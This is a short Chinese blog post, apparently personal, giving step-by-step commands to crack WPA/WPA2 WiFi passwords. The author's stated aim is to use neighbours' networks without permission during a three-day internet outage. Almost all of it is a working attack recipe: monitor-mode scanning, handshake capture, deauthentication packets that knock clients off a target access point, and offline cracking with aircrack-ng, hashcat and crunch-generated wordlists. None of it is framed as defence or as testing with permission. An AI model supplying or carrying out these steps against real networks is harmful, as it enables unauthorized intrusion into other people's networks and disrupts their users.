破解WPA/WPA2加密的WiFi密码

五月份正式从光电的宽带迁移到电信的网络 (包括手机运营商、高清电视),会有3天时间断网。于是学习下蹭网的方法。之前已经安装了黑客工具的源 blackarch,现在要什么就有什么。

安装 aircrack-ng 和 hashcat

sudo pacman -S aircrack-ng
sudo pacman -S hashcat

确认无线网卡设备信息(假设设备叫wlan0)

iwconfig

激活网卡的监听模式(设备名变成wlan0mon)

sudo airmon-ng start wlan0

获取附近AP信息

sudo airodump-ng wlan0mon

对指定AP进行抓包(CH=AP的频道, BSSID=AP的MAC, path=保存文件名)

sudo airodump-ng -c <CH> --bssid <BSSID> -w <path> wlan0mon

加速获取握手包(BSSID=AP的MAC, STATION=客户端的MAC)

sudo aireplay-ng -0 10 -a <BSSID> -c <STATION> wlan0mon

当监控程序显示 handshake: 时, 可停止抓包(CTRL + C)

解密抓到的数据(aircrack)

aircrack-ng -w <DICT> <path>-01.cap

DICT=字典文件, path=指定的包数据文件

解密抓到的包(hashcat more faster)

aircrack-ng <out.cap> -J <out.hccap>
hashcat -m 2500 <out.hccap> <DICT>

使用字典生成工具

sudo pacman -S crunch
crunch 8 8 charset.lst numeric -o num8.dic
crunch 1 6 charset.lst ualpha  -o test.dic

num8.dic=8位纯数字
test.dic=1~6位纯大写字母

标签: none

添加新评论